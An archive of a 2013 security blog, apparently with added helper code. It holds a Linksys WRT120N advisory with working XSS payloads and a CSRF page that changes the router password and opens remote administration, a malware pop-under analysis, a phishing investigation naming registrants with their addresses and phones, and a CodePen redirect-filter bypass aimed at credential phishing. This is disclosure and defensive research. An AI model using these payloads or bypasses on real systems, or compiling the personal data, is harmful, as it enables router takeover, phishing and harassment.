Thursday, October 17, 2013
Google Understands Ubuntu, a Visual Essay
Sunday, September 15, 2013
Linksys WRT120N Multiple Vulnerabilities (XSS, Redirect, CSRF)
The following examples assume the device is located at 192.168.1.1. The attacks require authentication to the router or a CSRF attack against an authenticated user.
Firmware
v1.0.07 (Build 02) (Download)
Serial and PIN
The device serial number, PIN code, firmware, MAC, and other information can be found at https://192.168.1.1/Hidden_infoPage.stm
Open Redirect
Page: wait.stm
Param: redirect_url
https://192.168.1.1/wait.stm?redirect_url=http://www.google.com&delay_time=0
Reflected XSS
Page: traceroute.stm
Param: taddress
https://192.168.1.1/traceroute.stm?taddress=www.google.com'><script>alert(1);</script>
Persistent XSS
Page: Setup->Basic Setup
Param: host_name
Param: domain_name
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
host_name='><script>alert(1);</script>
&domain_name='><script>alert(1);</script>
&delay=0&opp=add&gateway1=&gateway2=&gateway3=&gateway4=&LangSel=0&change_lang=0&wan_type=0&curAtmIdx=3%27&dhcp_clt=1&mtu_type=0&lan_ip1=192&lan_ip2=168&lan_ip3=1&lan_ip4=1&lan_subnet_mask=0&lan_mask1=255&lan_mask2=255&lan_mask3=255&lan_mask4=0&dhcp_server=1&r_dhcp_server=1&start_ip4=100&num_addr=50&lease_m=1440&s_dns11=0&s_dns12=0&s_dns13=0&s_dns14=0&sdns1=0.0.0.0&s_dns21=0&s_dns22=0&s_dns23=0&s_dns24=0&sdns2=0.0.0.0&s_dns31=0&s_dns32=0&s_dns33=0&s_dns34=0&sdns3=0.0.0.0&wins1=0&wins2=0&wins3=0&wins4=0&time_zone=4+1&exec_cgis=SetBS&ret_url=%2Findex.stm%3Ftitle%3DSetup-Basic%2520Setup
Persistent XSS
Page: Setup->Advanced Routing
Param: router_name
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
router_name='><script>alert(1);</script>
&delay=0&op=add&NAT=1&nat_enable=1&RIP=0&set_num=0&sr_ip1=0&sr_ip2=0&sr_ip3=0&sr_ip4=0&sr_mask1=0&sr_mask2=0&sr_mask3=0&sr_mask4=0&sr_gw1=0&sr_gw2=0&sr_gw3=0&sr_gw4=0&routing_interface=0&exec_cgis=SetAR&ret_url=%2Findex.stm%3Ftitle%3DSetup-Advanced%2520Routing
Persistent XSS
Page: Wireless->Wireless Security
Param: sharedkey
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
sharedkey=</script><script>alert(1);//
&delay=0&sec_mode=psk1&enc_type=0&rds_ip1=0&rds_ip2=0&rds_ip3=0&rds_ip4=0&rds_port=1812&rds_secret=&group_key_second=3600&encryption_type=0&passPhrase=&generate=0&key1=&key2=&key3=&key4=&TX_Key=0&exec_cgis=WirWS&ret_url=%2Findex.stm%3Ftitle%3DWireless-Wireless%2520Security
Persistent XSS
Page: Applications & Gaming->Port Range Triggering
Param: name0 (All nameX fields are vulnerable)
URL - https://192.168.1.1/cgi-bin/apply.cgi
POST Data
name0="><script>alert(1);</script>
&delay=0&tport0_start=1&tport0_end=2&gport0_start=1&gport0_end=2&name1=&tport1_start=&tport1_end=&gport1_start=&gport1_end=&name2=&tport2_start=&tport2_end=&gport2_start=&gport2_end=&name3=&tport3_start=&tport3_end=&gport3_start=&gport3_end=&name4=&tport4_start=&tport4_end=&gport4_start=&gport4_end=&name5=&tport5_start=&tport5_end=&gport5_start=&gport5_end=&name6=&tport6_start=&tport6_end=&gport6_start=&gport6_end=&name7=&tport7_start=&tport7_end=&gport7_start=&gport7_end=&name8=&tport8_start=&tport8_end=&gport8_start=&gport8_end=&name9=&tport9_start=&tport9_end=&gport9_start=&gport9_end=&exec_cgis=AppPRT&ret_url=%2Findex.stm%3Ftitle%3DApplications%2520%2526%2520Gaming-Port%2520Range%2520Triggering
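Every finding above reduces to one test: does the parameter come back in the page with its metacharacters intact, and in which context (attribute, text, or inside an inline script, which is why the sharedkey payload closes a script tag instead of an attribute quote). The Python below is an added example written for this page, not part of the original advisory or any Linksys tool. It assumes you fetch the page yourself (for instance with curl -k and the admin credentials) and hand the body to find_reflections(); the sample responses in the block are constructed to mimic traceroute.stm and the wireless-security page, not captured from a device, and the "html-encoded" check only recognises the entities Python's html.escape() produces.

```python
import html
import re
import secrets

# Inline <script> bodies: a reflection inside one needs different handling than
# one in an attribute or in text.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def make_canary():
    """A unique marker that carries the characters an injection needs: the letters
    make it greppable, the metacharacters make raw versus encoded output visible."""
    return "cn" + secrets.token_hex(3) + "'\"<>"


def _context(body, pos, script_spans):
    """Classify where a reflection landed: inside <script>, inside a tag, or in text."""
    if any(start <= pos < end for start, end in script_spans):
        return "script"
    last_lt = body.rfind("<", 0, pos)
    last_gt = body.rfind(">", 0, pos)
    return "attribute" if last_lt > last_gt else "text"


def find_reflections(body, canary):
    """Every place `canary` comes back, as (context, encoding) pairs: 'raw' when
    the metacharacters survived untouched, 'html-encoded' when they came back as
    the entities html.escape() produces (other encoders need their own variant)."""
    script_spans = [m.span(1) for m in SCRIPT_RE.finditer(body)]
    variants = [(canary, "raw"), (html.escape(canary, quote=True), "html-encoded")]
    hits = []
    for needle, encoding in variants:
        for m in re.finditer(re.escape(needle), body):
            hits.append((_context(body, m.start(), script_spans), encoding))
    return hits


def verdict(hits):
    """'reflected-raw' is the condition every XSS in this advisory relies on."""
    if any(encoding == "raw" for _, encoding in hits):
        return "reflected-raw"
    return "reflected-encoded" if hits else "not-reflected"


# Constructed sample responses (not captured from a WRT120N), using a fixed canary
# so the results are reproducible.
CANARY = "cnb3c4d5'\"<>"
# traceroute.stm-style page echoing taddress straight into an attribute value
VULNERABLE_ATTR = ("<html><body><form><input type='text' name='taddress' value='"
                   + CANARY + "'></form></body></html>")
# the same page after output encoding was added
FIXED_ATTR = VULNERABLE_ATTR.replace(CANARY, html.escape(CANARY, quote=True))
# a wireless-security page writing the key into an inline script
VULNERABLE_SCRIPT = ('<html><head><script>var sharedkey = "' + CANARY
                     + '";</script></head></html>')
# a page that does not reflect the parameter at all
UNRELATED = "<html><body>Status: ok</body></html>"

if __name__ == "__main__":
    for name, page in [("attribute", VULNERABLE_ATTR), ("attribute-fixed", FIXED_ATTR),
                       ("script", VULNERABLE_SCRIPT), ("unrelated", UNRELATED)]:
        hits = find_reflections(page, CANARY)
        print(f"{name:16} {verdict(hits):18} {hits}")
```

A 'script' context hit that is only entity-encoded is still worth a second look: entities are not decoded inside script text, so the breakout is blocked, but the surrounding JavaScript quoting still has to be correct.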
CSRF
Remote administration can be enabled and passwords can be changed via cross-site request forgery: apply.cgi accepts the same POST whether or not it came from the router's own pages, and there is no anti-CSRF token to supply, so loading a page like the following while the administrator is logged in is enough.
<html>
<head><title>CSRF Test</title></head>
<body>
<form id="csrf" method="post"
action="https://192.168.1.1/cgi-bin/apply.cgi">
<!-- Change admin password to NewPassword -->
<input type="hidden" name="change_pass" value="1" />
<input type="hidden" name="password" value="NewPassword" />
<input type="hidden" name="c_password" value="NewPassword" />
<input type="hidden" name="defPassword" value="admin" />
<!-- Enable remote administration via https port 6666 -->
<input type="hidden" name="r_web_https" value="1" />
<input type="hidden" name="r_web_wleb" value="1" />
<input type="hidden" name="remote_adm" value="1" />
<input type="hidden" name="r_remote_adm" value="1" />
<input type="hidden" name="r_remote_proto" value="1" />
<input type="hidden" name="admin_port" value="6666" />
<!-- Other values expected by the script -->
<input type="hidden" name="delay" value="0" />
<input type="hidden" name="beginip" value="0.0.0.0" />
<input type="hidden" name="endip" value="0.0.0.0" />
<input type="hidden" name="upnp" value="1" />
<input type="hidden" name="r_upnp" value="1" />
<input type="hidden" name="r_upnp_uset" value="1" />
<input type="hidden" name="r_upnp_dinetacc" value="0" />
<input type="hidden" name="wlan" value="1" />
<input type="hidden" name="reboot" value="0" />
<input type="hidden" name="exec_cgis" value="AdmM" />
<input type="hidden" name="ret_url"
value="%2Findex.stm%3Ftitle%3DAdministration-Management" />
</form>
<script>document.getElementById("csrf").submit()</script>
</body>
</html>
OS Command Injection
Similar models (like the WRT110) suffer from blind command injection attacks in parameters on the Ping diagnostics page. While unverified, it's likely the WRT120N contains similar vulnerabilities. The router repeatedly power cycled while testing this, so your mileage may vary.
https://192.168.1.1/ping.stm?paddress=X&ping_size=X&ping_no=X&ping_int=X&ping_time=X
Timeline
- 11 Apr 2013 - initial contact with support
- 12 Apr 2013 - ticket opened
- 17 Jul 2013 - asked for update
- 18 Jul 2013 - update, ticket still open
- 04 Sep 2013 - ticket closed
Linksys support says that the 10 minute session timeout within the WRT120N will mitigate the attack, so no firmware update is to be released. A session timeout only shortens the window, though: it does nothing against a CSRF page or a stored payload that fires while the administrator is logged in, and anyone changing router settings is logged in by definition.
Labels: advisory, csrf, open redirect, router, vulnerability, xss
Saturday, September 7, 2013
Cryptanalysis of David Spade
A recent cryptographic analysis of David Spade's numerology revealed a celebrity 0day: mathematical proof that David Spade is To Mega Therion, the Great Beast of Revelation.
DAVID = 4 1 22 9 4
SPADE = 19 16 1 4 5
4 + 1 + 22 + 9 + 4 = 40
19 + 16 + 1 + 4 + 5 = 45
2 names of 5 letters
10 letters total in name
40 / 10 = 4
45 / 10 = 4.5
4 * 4.5 = 18
18 = 6 * 3 = 6 + 6 + 6
SIX THREE TIMES! 666!
I haven't figured out how PGP figures into this yet, but I'm working on it.
Monday, March 4, 2013
Phisherman's Tales, Vol II
Being a fan of The Pirate Bay means running an ad blocker or fighting endless battles with popups. update85.com is a frequent pop-under advertisement served on The Pirate Bay. It prompts the user to install a "pro" version of Flash that will make your whole life awesome. Since there is no real pro version of Flash, what it actually installs is malware.
Update: the domain has since switched to update95.com.
Site Analysis
update85.com was purchased from Namecheap with WhoisGuard protection. Its server runs nginx and is currently located at 75.101.138.50 in the Amazon cloud. AWS and WhoisGuard is a pattern that's repeated with the other names and IPs as well. Take note, devs, even the bad guys are moving to the cloud.
The original pop-under URL:
http://update85.com/flashplayer/pro4/indexd1.php?&_mcnc&af=04f021240deadbeef5cf746771e3d54d&of=gTPB-5-usa%20%20&p=y&al=WARNING!%20Your%20Flash%20Player%20may%20be%20out%20of%20date.%20Please%20update%20to%20continue
The URL contains parameters for analytics and for tailoring the warning message that the page displays.
The "af" parameter is an identifying hash that's later used as a unique name for the executable payload.
Somewhat ironically, the "al" parameter containing the warning message is vulnerable to XSS.
update85.com/flashplayer/pro4/indexd1.php?al=WARNING!'); alert('xss
It's possible some of the other parameters, such as those logged for analytics, may be vulnerable to persistent XSS or SQLi as well.
Analyzing the source for the landing page gives us some inline JS, links to various pages (such as software licensing terms), and the link to the dropper program. The source for these files can be downloaded here (scroll down, click grey 'download' button, and wait for the timer to finish).
The inline javascript injects two remote scripts:
1) New Relic analytics code, including rum.js used for page timing measurements. Their New Relic api-key is e981baeb5e and their appID is 2056962.
2) 46.51.162.142/giq.js, which passes tracking information to a remote PHP logger located at pixeltrk.info/log.php with the following GET parameters:
'd' = document.location.hostname
'r' = escape(document.referrer)
'l' = escape(window.navigator.language)
'u' = escape(window.navigator.userAgent)
'loc' = escape(document.location.href)
It also contains the following comment:
//beta versionb - live to be hosted on: d1cebafy1ctaaq.cloudfront.net/1
pixeltrk.info resolves to 46.51.162.142 and is also an nginx, WhoisGuard'd AWS instance (located in the Ireland cloud).
Uninstall, Contact, and Terms
The uninstall page simply tells you to remove Flash Player Pro from your Add & Remove Programs option in the control panel. It then gives the following disclaimer:
Upon uninstall of the software certain data such as folders, files, registry keys, and cookies, may remain on your machine.
The licensing terms page is an agreement between you and "Download4Free.org." It's the general cover-my-ass legal license.
Finally, the contact information lists:
info@download4free.org
1601 Main St. Suite 90-151
Willimantic, CT
06226
The pages also say they were built using WYSIWYG Builder 8, so I lol'd. Download4Free.org is located at 184.168.221.42, registered with GoDaddy's Domains By Proxy, and is hosted at GoDaddy as well. It's an IIS 7.5 server running ASP.NET 4.0.30319. It's had some other SEO domains hosted on it as well.
File Analysis
If you click through the BS, you're eventually rewarded with a download of Flash Player Pro, served on nicdls.com. It is located at 176.31.90.48 in Spain, runs nginx and PHP/5.4.7-1~dotdeb.0, and was registered using Whois Privacy Service from DonDominio.com.
You can download your own copy from the live site here or download my copy of the executable from here (click grey 'download' button and wait for the timer to finish).
The executable that gets sent is a windows exe dropper. The name of the file depends upon your unique hash from the af parameter mentioned earlier, and follows the format V.unique_hash.
ham@meat:~/code$ file spam/V.04f021240deadbeef5cf746771e3d54d
spam/V.04f021240deadbeef5cf746771e3d54d: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
I haven't busted out IDA or anything yet, but a quick look at the file's strings shows calls to registry edits and drops to a temp folder. Running it through VirusTotal showed a detection ratio of 11/46, meaning 11 antivirus products flagged it as malicious. Most AVs detected it as W32/DomaIQ.A. You can view its results for yourself here.
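The file(1) line above packs four facts into one string: PE32, GUI subsystem, i386, and the NSIS marker. The Python below is an added example for this page, not the author's tooling and not part of file/libmagic; it reads those same fields from the PE headers and looks for the NSIS first-header magic, so a directory of droppers can be triaged offline. The bytes from build_sample() are constructed here to stand in for the real V.<hash> dropper, which is not included; the header offsets are the PE/COFF layout from the specification.

```python
import struct

# Values straight from the PE/COFF specification.
MACHINE = {0x014C: "Intel 80386", 0x8664: "x86-64", 0x01C0: "ARM", 0xAA64: "Aarch64"}
SUBSYSTEM = {1: "native", 2: "GUI", 3: "console"}
IMAGE_FILE_DLL = 0x2000
# NSIS writes this "first header" magic in front of its compressed payload; it is the
# string libmagic keys on for "Nullsoft Installer self-extracting archive".
NSIS_MAGIC = b"\xef\xbe\xad\xdeNullsoftInst"


def parse_pe(data):
    """Header facts for a PE image, or None when `data` is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    coff = e_lfanew + 4
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if opt_size < 70:  # need the optional header at least up to Subsystem
        return None
    (magic,) = struct.unpack_from("<H", data, opt)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)  # same offset in PE32 and PE32+
    return {
        "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "PE?"),
        "machine": MACHINE.get(machine, hex(machine)),
        "subsystem": SUBSYSTEM.get(subsystem, str(subsystem)),
        "dll": bool(characteristics & IMAGE_FILE_DLL),
        "nsis": NSIS_MAGIC in data,
    }


def describe(data):
    """A file(1)-style one-liner built from parse_pe()."""
    info = parse_pe(data)
    if info is None:
        return "data"
    kind = "DLL" if info["dll"] else "executable"
    text = f"{info['format']} {kind} ({info['subsystem']}) {info['machine']}, for MS Windows"
    if info["nsis"]:
        text += ", Nullsoft Installer self-extracting archive"
    return text


def build_sample():
    """A constructed, non-functional stand-in for the dropper: a minimal 32-bit GUI PE
    followed by the NSIS magic. It exists only so the functions above run offline."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after the DOS stub
    # i386, 3 sections, 224-byte optional header, EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x014C, 3, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<H", opt, 68, 2)     # Subsystem: WINDOWS_GUI
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + b"\0" * 512 + NSIS_MAGIC + b"\0" * 32


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(f"{path}: {describe(f.read())}")
    print(f"constructed sample: {describe(build_sample())}")
```

Run it as `python triage_pe.py spam/*` to get one line per file; the NSIS check is a plain substring search because that is also all libmagic does, so a packed or otherwise modified installer can hide it.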
Labels: malware, phish, phisherman's tales, phishing, pirate bay, popup
Tuesday, February 19, 2013
Phisherman's Tales, Vol I
On February 12th, an awesomely bad phishing email slammed head-long into my inbox. It was targeted at students and employees of my former university, so I decided to poke at it for giggles. The message and its headers:
Return-path: <msu@mus.edu>
Envelope-to: XXXXXXXX@msu.edu
Delivery-date: Tue, 12 Feb 2013 10:33:42 -0500
Received: from [202.123.76.219] (helo=bsdmail2.tgtnet.com)
by ZZZZ.ZZZZ.msu.edu with esmtp (Exim 4.75 #3)
id 1U5HrM-0006V8-HV; Tue, 12 Feb 2013 10:33:30 -0500
Received: from tgtnet.com (localhost.localdomain [127.0.0.1])
by bsdmail2.tgtnet.com (8.14.2/8.14.2) with ESMTP id r1CF4Xrm096120;
Tue, 12 Feb 2013 23:04:33 +0800 (HKT)
(envelope-from msu@mus.edu)
From: "Michigan State University" <msu@mus.edu>
Subject: Warning!!!
Date: Tue, 12 Feb 2013 23:04:32 +0800
Message-Id: <20130212145850.M25036@mus.edu>
X-Mailer: OpenWebMail 2.52 20060502
X-OriginatingIP: 180.74.192.93 (terry.yue)
MIME-Version: 1.0
Content-Type: text/plain;
charset=iso-8859-1
To: undisclosed-recipients:;
Content-Transfer-Encoding: quoted-printable
X-MIME-Autoconverted: from 8bit to quoted-printable by bsdmail2.tgtnet.com id r1CF4Xrm096120
[Snip]
Subject: *****SPAM***** Warning!!!
Body:
Dear Subscriber's,
We have detected some unusual message from your account,to avoid you loosing
your account or suspension,you will have to re-confirm your account for us to
know that you are the right full owner of this email account.
You are therefore required to click or copy the link
http://cks-online.com/wp-mail.htm
to enable us verify and perform maintenance in your email account with our
new system upgrading software.Failure to provide your valid information, your
account will be suspended temporarily from our services.
We sincerely apologize for the inconvenience this might have caused you.
Helpdesk Team,
© 2013 Michigan State University
All rights reserved.
Michigan State University. Est. 1855. East Lansing, Michigan USA.
Seems legit that the MSU helpdesk staff would send an email from "mus.edu" asking everyone to log into cks-online.com.
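The hops, the originating IP, the look-alike sender domain and the phish URL are exactly the things worth pulling out of a message like this before touching whois. The Python below is an added example written for this page, not the author's own script; it uses only the standard library and runs against a sample message constructed from the headers and body quoted above (the redactions are kept as they appear there). The org_domain argument is the domain the mail claims to come from, msu.edu here; the one-edit look-alike test is an assumption about what counts as suspicious, not a rule from the post.

```python
import email
import re
from email.utils import parseaddr

BRACKET_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
HELO_RE = re.compile(r"helo=([\w.-]+)", re.I)
FROM_RE = re.compile(r"^from\s+([\w.-]+)", re.I)
URL_RE = re.compile(r"https?://[^\s<>\"']+")
IP_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def relay_chain(msg):
    """Received hops, oldest first, as (name the relay claimed, IP the receiver saw).
    Only the bracketed IP is worth anything: the receiving MTA recorded it, whereas
    the helo/from name is whatever the sending side chose to say."""
    hops = []
    for received in reversed(msg.get_all("Received", [])):
        flat = " ".join(received.split())  # unfold continuation lines
        ip = BRACKET_IP_RE.search(flat)
        name = HELO_RE.search(flat) or FROM_RE.match(flat)
        hops.append((name.group(1) if name else None, ip.group(1) if ip else None))
    return hops


def osa_distance(a, b):
    """Optimal string alignment distance: insert/delete/substitute plus adjacent
    transposition, so a swapped pair of letters costs one step."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def lookalike(domain, expected):
    """True when `domain` is one edit away from `expected` but not equal to it."""
    domain, expected = domain.lower(), expected.lower()
    return domain != expected and osa_distance(domain, expected) == 1


def triage(raw, org_domain):
    """Pull the facts a first look at a phish needs out of a raw RFC 822 message."""
    msg = email.message_from_string(raw)
    sender = parseaddr(msg.get("From", ""))[1]
    sender_domain = sender.rsplit("@", 1)[-1] if "@" in sender else ""
    origin = IP_RE.search(msg.get("X-OriginatingIP", ""))
    payload = msg.get_payload(decode=True)
    body = payload.decode(msg.get_content_charset() or "latin-1", "replace") if payload else ""
    return {
        "hops": relay_chain(msg),
        "origin_ip": origin.group(0) if origin else None,
        "sender_domain": sender_domain,
        "lookalike_of": org_domain if lookalike(sender_domain, org_domain) else None,
        "urls": URL_RE.findall(body),
    }


# Constructed from the headers and body quoted above (redactions kept as they appear there).
SAMPLE = "\n".join([
    "Return-path: <msu@mus.edu>",
    "Envelope-to: XXXXXXXX@msu.edu",
    "Received: from [202.123.76.219] (helo=bsdmail2.tgtnet.com)",
    "\tby ZZZZ.ZZZZ.msu.edu with esmtp (Exim 4.75 #3)",
    "\tid 1U5HrM-0006V8-HV; Tue, 12 Feb 2013 10:33:30 -0500",
    "Received: from tgtnet.com (localhost.localdomain [127.0.0.1])",
    "\tby bsdmail2.tgtnet.com (8.14.2/8.14.2) with ESMTP id r1CF4Xrm096120;",
    "\tTue, 12 Feb 2013 23:04:33 +0800 (HKT)",
    "\t(envelope-from msu@mus.edu)",
    'From: "Michigan State University" <msu@mus.edu>',
    "Subject: Warning!!!",
    "X-OriginatingIP: 180.74.192.93 (terry.yue)",
    "Content-Type: text/plain; charset=iso-8859-1",
    "",
    "You are therefore required to click or copy the link",
    "http://cks-online.com/wp-mail.htm",
    "to enable us verify and perform maintenance in your email account.",
])

if __name__ == "__main__":
    for key, value in triage(SAMPLE, "msu.edu").items():
        print(f"{key}: {value}")
```

The oldest hop is the webmail host talking to itself on 127.0.0.1; the first address an outside MTA actually recorded is 202.123.76.219, and X-OriginatingIP is the webmail application's own note of the client, which is why the two whois lookups that follow target those two addresses.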
Let's dig into some of the IPs from the headers. All of this information is freely available through domain and network registrations.
202.123.76.219
inetnum: 202.123.64.0 - 202.123.95.255
netname: HENDERSON
descr: Henderson Data Centre Limited
descr: 6/F, World-Wide House,Central
country: HK
person: Tech Admin
address: Henderson Data Centre Limited
address: 17/F WELL TECH CENTRE
address: 9 Pat Tat Street
address: San Po Kong
address: Kowloon
address: Hong Kong
country: HK
phone: +852-2908-6900
fax-no: +852-2908-6966
e-mail: tech.admin@ihenderson.com
180.74.192.93
inetnum: 180.72.0.0 - 180.75.255.255
netname: P1NETWORKS-MY
descr: Packet One Networks (M) Sdn
descr: Internet Service Provider
descr: Kuala Lumpur, Malaysia
country: MY
person: Seng Hoon Lee
nic-hdl: SL2018-AP
e-mail: senghoon.lee@packet-1.com
address: Level 4, PacketHub,
address: 59 Jalan Templer,
address: 46050 Petaling Jaya, Selangor,
address: Malaysia.
phone: +603-74508888
fax-no: +603-74508891
Huh. Mr. Seng Hoon Lee is gettin' busy. So, how about the phishing site, cks-online.com?
Queried whois.godaddy.com with "cks-online.com"...
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
Domain Name: CKS-ONLINE.COM
Created on: 28-Feb-09
Expires on: 28-Feb-13
Last Updated on: 25-Feb-12
Registrant:
Stanley Ling
29, Jalan 1826,
Taman Sri Rampai, Setapak,
Kuala Lumpur, WP 53300
Malaysia
Administrative Contact:
Ling, Stanley stanley.ling@gmail.com
29, Jalan 1826,
Taman Sri Rampai, Setapak,
Kuala Lumpur, WP 53300
Malaysia
+60.60126480288
Oh Stanley Ling, you card! You can see the ~136 other phishing and SEO sites hosted on the same IP here.
Queried whois.arin.net with "n 97.79.238.221"...
NetRange: 97.76.0.0 - 97.79.255.255
CIDR: 97.76.0.0/14
OriginAS:
NetName: RCSW
NetHandle: NET-97-76-0-0-1
Parent: NET-97-0-0-0-0
NetType: Direct Allocation
RegDate: 2007-09-11
Updated: 2012-02-24
Ref: http://whois.arin.net/rest/net/NET-97-76-0-0-1
OrgName: Road Runner HoldCo LLC
OrgId: RCSW
Address: 13820 Sunrise Valley Drive
City: Herndon
StateProv: VA
PostalCode: 20171
Country: US
RegDate: 2001-09-07
Updated: 2011-07-06
Next let's wget the contents of the page and see what was shakin' over there.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>
Account Verification Page
</title></head>
<frameset rows="100%">
<frame src="http://sycure.boxhost.me/efe/Login.htm" />
<noframes>
<body>Please follow the <a href="http://sycure.boxhost.me/efe/Login.htm">link</a>.</body>
</noframes>
</frameset>
</html>
Lame. Boxhost.me is a free web hosting service, and now we have a username: sycure. A search for it brings up an infosec blog: sycure.wordpress.com. In the interests of science, I used wget to mirror everything on sycure.boxhost.me, which you can download here. Stan made 3-4 versions of the same phishing site, apparently. There's not much worthwhile here, just shitty code. The robots.txt implies a WordPress install, but I didn't see one:
User-agent: *
Disallow: /wp-admin/
Disallow: /wp-includes/
The phishing page forwards your credentials to a PHP script, presumably to send them off, and then bounces you to a thankyou.html page. The interesting part here was the analytics code at the bottom of the Thank You page:
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-491816-39");
pageTracker._trackPageview();
} catch(err) {}</script>
Their analytics tracking number is listed near the end: UA-491816-39. Googling it brings us scrapes of a bunch of pages, the topmost of which are Formmailhosting.com, Youtubedriver.com, and Ricksgamblingguide.com. Formmailhosting is an affiliate marketing program (shocking), with a YouTube page about affiliate marketing (also shocking).
Let's check out formmailhosting.com:
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
Domain Name: FORMMAILHOSTING.COM
Created on: 17-Dec-08
Expires on: 17-Dec-13
Last Updated on: 18-Dec-12
Registrant:
Fleming Technologies
7156 Georgetown
Washington, Michigan 48095
United States
Administrative Contact:
Fleming, Sherry bfleming98@gmail.com
Fleming Technologies
7156 Georgetown
Washington, Michigan 48095
United States
(248) 974-6876
Sherry's email seems a little odd: bfleming. A search for "sherry fleming michigan" brings us to the Flash site of a web designer who apparently has worked on a poker site. The address listed on the page is the same as the one in the domain registration above.
The address seems to jibe with the registration information, but whose email was that? A quick Google of "bfleming98@gmail.com" shows Bryan C. Fleming, owner of a slew of domain names. Fair enough.
But what about our mysterious Stanley Ling? Stan registered his domain to stanley.ling@gmail.com, located at 29 Jalan 18/26, Taman Sri Rampai, Setapak in Kuala Lumpur, Malaysia. Here's a map.
Searching the registration email that was used, "stanley.ling@gmail.com," gives us his profile at a marketing website, where he confirms the email address and uses the username "syling."
It's worth noting that Gmail ignores periods in the local part of an address, so we can also search for stanleyling@gmail.com. This gives us multiple SEO marketing sites. His cks-online.com domain now bounces to a suspended page for an affiliate marketing program.
A search for "stanley ling malaysia" brings us multiple hits for an actual Stanley Ling living in Setapak and using the name syling. He has multiple profiles confirming his address and interests in online marketing.
So, there you have it. Was Stan owned by a fellow affiliate marketer or was he the originator? Who knows, but I had fun anyway.
Sunday, December 30, 2012
Weaponizing Pt 3: CodePen Redux
Note: CodePen has been notified of these problems and has fixed them. This is an analysis of how their original fix was bypassed and these techniques could possibly be applied to future redirection vulnerabilities.
Since my post about using code playgrounds as attack platforms, CodePen has added some JavaScript that will alert a user if the pen is trying to redirect them to a 3rd party domain. If you use the example redirect code from earlier in this series, you'll be presented with a prompt asking you if you'd like to leave CodePen. This article explains how to work around this code and carry out a redirection.
At the time of this writing, you can use Chrome developer tools or FireBug to see this code in action:
window.__canLeave = false;
window.onbeforeunload = function() {
if (!__canLeave) {
return "WARNING! You are leaving the safety of CodePen! Are you sure you want to leave?";
}
};
setTimeout(function() {
window.__canLeave = true;
}, 200);
In this code, they are hooking the onbeforeunload window event, which will execute their function when the browser window attempts to "unload" (read: navigate away from) the current page. As written, the timer flips __canLeave to true 200 ms after the script runs, so unless something else resets the flag only navigations fired inside that window produce the prompt. If you tried our form-based redirect, you may have noticed that they will also attempt to overwrite form actions pointing to other domains.
Bypassing the Prompt
There are a couple of ways we can disable this prompting function. The first, blunt approach, is simply overwriting the window.onbeforeunload hook. We'll replace their function with a blank one of our own, then carry out our redirect (the spaced-out string is reassembled at runtime, so the literal text window.location never appears in the pen's source):
<script>
window.onbeforeunload = function() {null;}
var target = 'win dow.loca tion="htt p://www.goo gle.com";';
eval(target.replace(/ /gi, ''));
</script>
A slightly more elegant approach is to not modify their function logic, but simply meet the function's requirements for a redirect. Because their __canLeave variable is attached to the window object, we can access it from our own script. So, let's just overwrite it:
<script>
window.__canLeave = true;
var target = 'win dow.loca tion="htt p://www.goo gle.com";';
eval(target.replace(/ /gi, ''));
</script>
Bypassing the Action Rewrite
This one is pretty easy. They're looking for form actions in our HTML, so we can overcome their form action filtering by dynamically assigning our form's action in JavaScript. Chaining our two techniques together gives us the following working redirect code:
<form id="bbb" />
<script>
window.__canLeave = true;
document.getElementById("bbb").action = "http://www.google.com";
document.getElementById("bbb").submit();
</script>
So Long And Thanks For All The Phish
So, besides open redirects, what else can we do with all of this? Well, CodePen has started rolling out professional accounts, and you no longer need Github to make one. Why not use their site to make a pen and go phishing?
Using data URIs combined with redirects, it would be easy to clone their login page in a pen. Add a message saying, "This pen is protected. Please log in to continue." We can now redirect any entered credentials to our own 3rd party site, log them for future use, then bounce the user to a real pen.
Summary
